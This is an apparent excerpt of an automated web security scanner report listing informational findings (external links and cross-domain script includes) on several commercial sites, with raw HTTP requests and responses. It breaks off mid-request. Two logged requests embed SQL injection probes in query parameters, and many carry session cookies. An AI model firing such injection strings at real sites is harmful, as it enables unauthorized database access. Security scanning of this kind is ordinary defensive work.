<td>MMPC: Operation b107 ... Rustock Botnet Takedown <a href="http://bit.ly/gMjbMZ" target="_blank">http://bit.ly/gMjbMZ</a>
...[SNIP]...
20.112. http://www.my-happyfeet.com/cart.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.my-happyfeet.com
Path:   /cart.asp

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /cart.asp?mode=login&refurl=%2Fcart%2Easp%3Frp%3Dhttp%253A%252F%252Fmy%252Dhappyfeet%252Ecom%252Fproddetail%252Easp%253Fprod%253D0001 HTTP/1.1
Host: www.my-happyfeet.com
Proxy-Connection: keep-alive
Referer: http://my-happyfeet.com/cart.asp?rp=http%3A%2F%2Fmy%2Dhappyfeet%2Ecom%2Fproddetail%2Easp%3Fprod%3D0001
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDCSCRQASR=LKCFJOIBLEKBOBFCACPKBNGA

Response

HTTP/1.1 200 OK
Date: Wed, 30 Mar 2011 12:09:25 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: PleskWin
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
Content-Length: 24599
Content-Type: text/html
Cache-control: private

<!-- Copyright, My Happy Feet - All rights reserved. This document and its graphics were created by ATG (http://www.atgincorporated.com/).
Any reproduction of site content or images without written
...[SNIP]...
<meta http-equiv="imagetoolbar" content="no">
<link rel="start" href="http://www.myhappyfeetcolors.com/" title="Home">
<meta name="GENERATOR" content="ATG Programming Department">
...[SNIP]...
</font>
           <a target="_blank" style="text-decoration: underline" href="http://www.atgincorporated.com/">
           <font color="#FFFFFF">
...[SNIP]...
</table>
   <a href="http://www.instantssl.com" id="comodoTL">SSL</a>
...[SNIP]...
20.113. http://www.nutter.com/careers.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nutter.com
Path:   /careers.php

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /careers.php?CategoryID=(select+1+and+row(1%2c1)%3e(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))&CareerID=17&SectionID=380 HTTP/1.1
Host: www.nutter.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Fri, 25 Mar 2011 19:08:32 GMT
Server: Apache/1.3.42 Ben-SSL/1.60 (Unix) PHP/4.4.9 with Suhosin-Patch
X-Powered-By: PHP/4.4.9
Content-Type: text/html
Content-Length: 15724

<!-- careers start -->


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/2000/REC-xhtml1-20000126/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999
...[SNIP]...
<div id="adFlashContent1"><a href="http://www.macromedia.com/go/getflashplayer" title="Download Macromedia Flash">Get Flash</a>
...[SNIP]...
<div id="adFlashContent2"><a href="http://www.macromedia.com/go/getflashplayer" title="Download Macromedia Flash">Get Flash</a>
...[SNIP]...
20.114. https://www.plimus.com/jsp/buynow_analytics.jsp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.plimus.com
Path:   /jsp/buynow_analytics.jsp

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /jsp/buynow_analytics.jsp?contractId=1947672&arg0=-99&captureFP=N&arg1=web46250979039532226&arg2=true HTTP/1.1
Host: www.plimus.com
Connection: keep-alive
Referer: https://www.plimus.com/jsp/buynow.jsp?contractId=1947672
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: contractId=1947672; sessionId=web46250979039532226; __utmz=254660169.1299810311.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=254660169.313124860.1299810311.1299810311.1299810311.1; JSESSIONID=F8FC4628B8C4E155C25B9BB3292DCBBF

Response

HTTP/1.1 200 OK
Date: Sat, 26 Mar 2011 17:12:17 GMT
Server: Apache
Keep-Alive: timeout=5, max=150
Connection: Keep-Alive
Content-Type: text/html;charset=UTF-8
Content-Length: 69784

<html><head>
<script type="text/javascript" language="javascript">
           /*
* jQuery JavaScript Library v1.3.2
* http://jquery.com/
*
* Copyright (c) 2009 John Resig
* Dual licensed under the MIT
...[SNIP]...
<body>

<object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" id="plimusAnalyticsFlash" width="1" height="1" codebase="https://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab">
<param name="movie" value="https://www.plimus.com/swf/Analytics-1.1.swf" />
...[SNIP]...
20.115. http://www.soundingsonline.com/archives/'+NSFTW+'  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /archives/'+NSFTW+'

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /archives/'+NSFTW+'?ordering=&searchphrase=all HTTP/1.1
Host: www.soundingsonline.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 25 Mar 2011 19:13:21 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<li class="item105"><a href="http://www.barkerstores.com/soundings" target="_blank"><span>
...[SNIP]...
www.soundingsonline.com/index.php?option=com_content&view=category&layout=blog&id=98&Itemid=111" alt="Buy a Boat" onmouseover="rollOn('nav1'); return true;" onmouseout="rollOff(); return true;" />
           <area shape="rect" coords="131,0,241,40" href="http://www.soundingssellmyboat.com/" target="_blank" alt="Sell a Boat" onmouseover="rollOn('nav2'); return true;" onmouseout="rollOff(); return true;" />
           <area shape="rect" coords="242,0,357,40" href="http://www.soundingsonline.com/component/content/article/237622" alt="Service Directory" onmouseover="rollOn('nav3'); return true;" onmouseout="rollO
...[SNIP]...
<li class="item69"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&amp;PUBID=586&amp;SOURCE=INET&amp;RDRID=&amp;SBTYPE=XX&amp;PGTP=A"><span>
...[SNIP]...
<li class="item73"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&amp;PUBID=586&amp;SOURCE=INET&amp;RDRID=&amp;SBTYPE=AC&amp;PGTP=A"><span>
...[SNIP]...
<li class="item75"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&amp;PUBID=5U6&amp;SOURCE=INET&amp;RDRID=&amp;SBTYPE=QR&amp;PGTP=A"><span>
...[SNIP]...
<li class="item76"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&amp;PUBID=SND&amp;SOURCE=INET&amp;RDRID=&amp;SBTYPE=QN&amp;PGTP=S"><span>
...[SNIP]...
<li class="item77"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&amp;PUBID=586&amp;SOURCE=INET&amp;RDRID=&amp;SBTYPE=QN&amp;PGTP=S"><span>
...[SNIP]...
<li class="item202"><a href="http://ezsub.net/i/f.dll/main.sv.run?jt=E2&amp;ECODE=SNDDSP1&amp;DBG=f"><span>
...[SNIP]...
<li class="item232"><a href="http://www.barkerstores.com/soundings/"><span>
...[SNIP]...
</div>
           -->

       <script type="text/javascript" src="http://www.paperg.com/jsfb/embed.php?pid=3922&bid=2123"></script><br /><div id="PG_link" align="center"><a href="http://www.paperg.com/">Local advertising</a>
...[SNIP]...
<li class="item58"><a href="http://www.dominionenterprises.com/main/do/Privacy_Policy" target="_blank"><span>
...[SNIP]...
<li class="item57"><a href="http://www.dominionenterprises.com/main/do/Terms_of_Use" target="_blank"><span>
...[SNIP]...
</script>
<img src="http://b.collective-media.net/seg/cm/de18_1" width="1" height="1" />
</body>
...[SNIP]...
20.116. https://www.supermedia.com/spportal/spportalFlow.do  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.supermedia.com
Path:   /spportal/spportalFlow.do

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /spportal/spportalFlow.do?_flowExecutionKey=_c72E3531B-BBB6-02E7-D78D-78C029B43197_kD65AFD8F-D02B-C0F7-97BF-3AA7A98A7264 HTTP/1.1
Host: www.supermedia.com
Connection: keep-alive
Referer: https://www.supermedia.com/help/web-site-design
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=4487424B77C0217B5BAEF5DAE41C714C.app4-a2; trafficSource=default; CstrStatus=RVU; NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139c45525d5f4f58455e445a4a42378b; mbox=session#1301080493266-271579#1301083848|check#true#1301082048; s_cc=true; undefined_s=First%20Visit; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Server: Unspecified
Date: Fri, 25 Mar 2011 19:39:05 GMT
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Cache-Control: no-store
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Connection: close
Content-Length: 24615


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<title>Online Advertising : Superpages Small Business Online Advertising</title>



...[SNIP]...
<noscript><iframe src="https://view.atdmt.com/iaction/00asup_RetargetingSecure_1" width="1" height="1" frameborder="0" scrolling="No" marginheight="0" marginwidth="0" ></iframe>
...[SNIP]...
<noscript><iframe src="https://view.atdmt.com/iaction/00asup_SigninbuttonPage_10" width="1" height="1" frameborder="0" scrolling="No" marginheight="0" marginwidth="0" topmargin="0" leftmargin="0"></iframe>
...[SNIP]...
<a href="http://www.boldchat.com" title="Live Chat" target="_blank">
   <img alt="Live Chat" src="https://vms.boldchat.com/aid/3760177095415339810/bc.vmi?wdid=798708614246318013&amp;vr=visitorReference&amp;vi=&amp;vn=&amp;vp=&amp;ve=&amp;curl=" border="0" width="1" height="1" /></a>
...[SNIP]...
20.117. https://www.territoryahead.com/jump.jsp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.territoryahead.com
Path:   /jump.jsp

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /jump.jsp?itemType=CATEGORY&itemID=-1+OR+17-7%3d10&path=1%2C2%2C195%2C241 HTTP/1.1
Host: www.territoryahead.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mmlID=68408168; CoreID6=82806333286612990907467&ci=90232094; customer=92643931

Response

HTTP/1.1 200 OK
Date: Fri, 25 Mar 2011 19:16:11 GMT
Server: Apache
Cache-Control: no-cache
Pragma: No-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Keep-Alive: timeout=2, max=100
Connection: Keep-Alive
Content-Type: text/html;charset=UTF-8
Content-Length: 38592


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>


<meta name="ve
...[SNIP]...
<div id="versignIcon"><a target="_blank" href="https://seal.verisign.com/splash?form_file=fdf/splash.fdf&dn=WWW.TERRITORYAHEAD.COM&lang=en"><img src="/images/us/global/globalgraphics/footerseal_exsmall.gif" alt="Verisign Secured" border="0">
...[SNIP]...
21. Cross-domain script include  previous  next
There are 59 instances of this issue:

Issue background

When an application includes a script from an external domain, this script is executed by the browser within the security context of the invoking application. The script can therefore do anything that the application's own scripts can do, such as accessing application data and performing actions within the context of the current user.

If you include a script from an external domain, then you are trusting that domain with the data and functionality of your application, and you are trusting the domain's own security to prevent an attacker from modifying the script to perform malicious actions within your application.

Issue remediation

Scripts should not be included from untrusted domains. If you have a requirement which a third-party script appears to fulfil, then you should ideally copy the contents of that script onto your own domain and include it from there. If that is not possible (e.g. for licensing reasons) then you should consider reimplementing the script's functionality within your own code.

21.1. http://ad.doubleclick.net/adi/N2524.134426.0710433834321/B4169763.45  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N2524.134426.0710433834321/B4169763.45

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /adi/N2524.134426.0710433834321/B4169763.45;sz=728x90;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=B_3W2gOaNTb_MJcfPlQfPk9SfDJWpie8BhaKK8hLjqLazM4DergIQARgBIL7O5Q04AFDEwrTWBmDJBqABo67u9gOyAQZ4c3MuY3i6AQk3Mjh4OTBfYXPIAQnaAS5odHRwOi8veHNzLmN4L2V4YW1wbGVzL2FjdW5ldGl4LzFhbmQxLWFjdS5odG1suAIYwAIFyALl78UYqAMB0QNftM276KVd5OgDaOgDrgL1AwAAAMQ&num=1&sig=AGiWqtzQTOPrKOw5jbAV3R0-O_Vx0ho4QA&client=ca-pub-4063878933780912&adurl=;ord=403758047? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1301163258&flash=10.2.154&url=http%3A%2F%2Fxss.cx%2Fexamples%2Facunetix%2F1and1-acu.html&dt=1301145263878&bpp=3&shv=r20110315&jsv=r20110321-2&correlator=1301145263926&frm=0&adk=1819763764&ga_vid=1614914829.1301145264&ga_sid=1301145264&ga_hid=614052216&ga_fc=0&u_tz=-300&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1167&bih=1049&fu=0&ifi=1&dtd=170&xpc=aCf5lBJVxh&p=http%3A//xss.cx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; id=c708f553300004b|998766/320821/15055,1831140/746237/15055,2818894/957634/15036,578176/951462/15032|t=1297805141|et=730|cs=v3vpvykb

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 6858
Cache-Control: no-cache
Pragma: no-cache
Date: Sat, 26 Mar 2011 13:13:37 GMT
Expires: Sat, 26 Mar 2011 13:13:37 GMT
Discarded: true

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
<!-- Code auto-generated on Thu Sep 16 11:15:28 EDT 2010 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script>
...[SNIP]...
21.2. http://ad.doubleclick.net/adi/N5956.Google/B3941858.12  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N5956.Google/B3941858.12

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /adi/N5956.Google/B3941858.12;sz=728x90;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=BuhlESOmMTaTqLsW6lQeZ4K2JCMy95NwB5MGbzhnAjbcBwMmjARABGAEgvs7lDTgAUOO0w5sGYMkGoAHw7Iz1A7oBCTcyOHg5MF9hc8gBCdoBQWZpbGU6Ly8vQzovY2RuL2V4YW1wbGVzL25ldHNwYXJrZXIvd3d3LnNvdW5kaW5nc29ubGluZS5jb21fODAuaHRtuAIYyAKUpN0RqAMB0QNftM276KVd5OgDxwb1AwIAAMQ&num=1&sig=AGiWqtyxZvX1KKMfNg9J_efkBZftCuyf_A&client=ca-pub-4063878933780912&adurl=;ord=1246807419? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1301098441&flash=10.2.154&url=file%3A%2F%2F%2FC%3A%2Fcdn%2Fexamples%2Fnetsparker%2Fwww.soundingsonline.com_80.htm&dt=1301080440634&bpp=4&shv=r20110315&jsv=r20110321-2&correlator=1301080441371&frm=0&adk=1607234649&ga_vid=967180559.1301080441&ga_sid=1301080441&ga_hid=295407676&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1410&bih=979&eid=44901217&fu=0&ifi=1&dtd=764&xpc=MMXNXDQ6lh&p=file%3A//
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; id=c708f553300004b|998766/320821/15055,1831140/746237/15055,2818894/957634/15036,578176/951462/15032|t=1297805141|et=730|cs=v3vpvykb

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 6773
Cache-Control: no-cache
Pragma: no-cache
Date: Fri, 25 Mar 2011 19:13:14 GMT
Expires: Fri, 25 Mar 2011 19:13:14 GMT
Discarded: true

<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->
<!-- Code auto-generated on Thu Feb 10 14:47:14 EST 2011 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script>
...[SNIP]...
21.3. http://ad.doubleclick.net/adi/huffpost.politics/news  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/huffpost.politics/news

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /adi/huffpost.politics/news;new-york=1;politics=1;;entry_id=840995;@depressing=1;@mostpopular=1;@recommend=1;@ypolitics=1;@yus-news=1;ferraro=1;ferraro-dead=1;ferraro-dies=1;ferraro-passes=1;geraldine-ferraro=1;geraldine-ferraro-cancer=1;geraldine-ferraro-dead=1;geraldine-ferraro-died=1;geraldine-ferraro-dies=1;geraldine-ferraro-passes=1;gerry-ferraro-dead=1;gerry-ferraro-dies=1;gerry-ferraro-passes=1;global=1;cap_12=n;qcs=D;qcs=T;qcs=2687;qcs=2685;qcs=2402;qcs=1910;qcs=1908;qcs=1905;qcs=1592;qcs=683;qcs=682;qcs=680;qcs=679;qcs=678;qcs=677;qcs=676;qcs=666;qcs=665;qcs=660;qcs=657;;plat=win;br=ch;bv=10;subbv=0;load_mode=inline;page_type=bpage;pos=leaderboard_top;hot=fb;hot=tw;u=728x90%7Cbpage%7Cleaderboard_top%7C@depressing,@mostpopular,@recommend,@ypolitics,@yus-news,ferraro,ferraro-dead,ferraro-dies,ferraro-passes,geraldine-ferraro,geraldine-ferraro-cancer,geraldine-ferraro-dead,geraldine-ferraro-died,geraldine-ferraro-dies,geraldine-ferraro-passes,gerry-ferraro-dead,gerry-ferraro-dies,gerry-ferraro-passes%7Cfb,tw%7C%7CD,T,2687,2685,2402,1910,1908,1905,1592,683,682,680,679,678,677,676,666,665,660,657%7C840995%7C%7C%7C;sz=728x90;tile=1;ord=20736431? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.huffingtonpost.com/2011/03/26/geraldine-ferraro-dead-dies_n_840995.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; id=c708f553300004b|998766/320821/15055,1831140/746237/15055,2818894/957634/15036,578176/951462/15032|t=1297805141|et=730|cs=v3vpvykb

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 11077
Date: Sat, 26 Mar 2011 20:36:05 GMT
Vary: Accept-Encoding
Expires: Sat, 26 Mar 2011 20:36:05 GMT
Cache-Control: private, x-gzip-ok=""

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All
...[SNIP]...
<!-- Code auto-generated on Fri Mar 11 11:54:58 EST 2011 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script>
...[SNIP]...
21.4. http://advertising.microsoft.com/search-advertising  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://advertising.microsoft.com
Path:   /search-advertising

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /search-advertising?s_cid=us_bing_footer HTTP/1.1
Host: advertising.microsoft.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MC1=GUID=688642bf9d16e14b952901540959fda0&HASH=bf42&LV=20112&V=3; MUID=FA3AE6176FAC4414AD6FC26C726B4B15; A=I&I=AxUFAAAAAAAABwAADIe+FnxFI293k92k7DipMA!!&CS=126gi600017030E02h7030E; __unam=289c965-12e721b8405-5ba8ac9c-2; _opt_vi_LECG2UZC=70FF57B5-618B-4C89-A6E0-AEEFB08346CB; R=200027254-3/8/2011 14:53:52; _opt_vi_06F86FDK=742B89EE-F086-4032-9920-451B209CBC09; msdn=L=1033; omniID=ue; WT_NVR_RU=0=technet|msdn:1=:2=; MSID=Microsoft.CreationDate=02/15/2011 21:42:53&Microsoft.LastVisitDate=03/22/2011 21:02:41&Microsoft.VisitStartDate=03/22/2011 21:02:41&Microsoft.CookieId=cdefcdbc-cd58-426e-a2b9-6d4d032c5554&Microsoft.TokenId=0242265b-d73d-484f-a494-b6344e553cef&Microsoft.NumberOfVisits=22&Microsoft.IdentityToken=plYFWp/Sav9RboFYJDENknWK0M3HKGRxExSO3ZthrhvxePoaRD543/4jCDtpABDhXvGu6hYw2p7w2OmmFcnnIATCsqP2cDLpwOaak2MSqpcwaZgium6WkbxRI/3lfq0Gws5gcoTO900VpbrWwnZWkk0h7DvuOUy8fvvcOIGUata8oggRE3IuQrAHBEdOSC/VqwuxZuA8KPU+oVMW2WeVUbt/xABiD8cXjH/eMrCCuxuZz35IbR8vQoULMMLVcABNmxQVsXvFb9OdB+JXJYi7RA0KQqL3iTcg1W/EF1rgR0gVqEcUWJN4qVllIbUGiU8N0wicUcjkNMpnYKw6LUumclx6R3aZQ45I51JtrotJDDVuP0DWwWnW13onH24nmUTXBZBOheXFYzynksZs2l8NLvKjXhpdbbc9j9a1dbb4rMVVXHpY30MRfbCM47a1gnmlVVOW+qUz6A30GY5CvEOLiGN25+nvYeNS7r4egZVUUXGtCCTuwHLaMByKYLNBjzcYx+KFLbPw3vUTZZB9kkHuQTlG3YCkF73XUqeC+mr8Xi8=&Microsoft.MicrosoftId=0189-2123-7087-5274&Microsoft.CookieFirstVisit=1; WT_FPC=id=173.193.214.243-1295665472.30133593:lv=1300816975750:ss=1300816958515; MS0=38ceddfa393547488a60161c1088230a

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Expires: Sat, 26 Mar 2011 00:58:45 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: ExternalOmnitureTrackingCode=us_bing_footer; path=/
X-Powered-By: ASP.NET
Date: Sat, 26 Mar 2011 00:58:44 GMT
Content-Length: 59618


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<meta http-equiv="X-UA-Compatible" content="IE=
...[SNIP]...
<![endif]--><script src="//ajax.aspnetcdn.com/ajax/jquery/jquery-1.4.4.min.js" type="text/javascript"></script>
...[SNIP]...
21.5. http://bidder.mathtag.com/iframe/notify  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bidder.mathtag.com
Path:   /iframe/notify

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /iframe/notify?exch=adx&id=5aW95q2jLzEvUTBGRlUwVkphRFJpVVU5RVQzbFJWa3h3UlZsUlRIVnZObUZCL05HUTFZakl6TnpFdE16a3lPQzAzWVRnekxUSTBabUl0WkRVeU16STRaalUyTWpSaS81NDM5Mzc1MTA2NjM4MDM3OS8xMDk2NjQvMTAyMTY4LzQvcUNrUlV0a2tSODZTZllSNWtDMUZwcG5NelEyY2tlaWdSdTZMeEpRUzkyRS8/MpDSwvg5GdsMNZTleYApVCKa2Fo&price=TY1DWwAGmFoK5X_Ef7dLZSWZTQqUNqdlAdKhdw&dck=http://googleads.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBOV_6W0ONTdqwGsT_lQfllt39B9zvj_EB5PW9vBGs6YOTEgAQARgBIAA4AVCAx-HEBGDJBoIBF2NhLXB1Yi01ODEyNzMxOTQxMTcwNTgzoAHg6pnsA7IBF3d3dy5zb3VuZGluZ3NvbmxpbmUuY29tugEJNzI4eDkwX2FzyAEJ2gFKaHR0cDovL3d3dy5zb3VuZGluZ3NvbmxpbmUuY29tL2FyY2hpdmVzLytOU0ZUVys_b3JkZXJpbmc9JnNlYXJjaHBocmFzZT1hbGyYAtQWwAIEyALWwYwOqAMB6APLA_UDAAAAxIAGg5z-k4L07Phv%26num%3D1%26sig%3DAGiWqtx9q6AzNXuiMRPfKd7knjv7C82atQ%26client%3Dca-pub-5812731941170583%26adurl%3D HTTP/1.1
Host: bidder.mathtag.com
Proxy-Connection: keep-alive
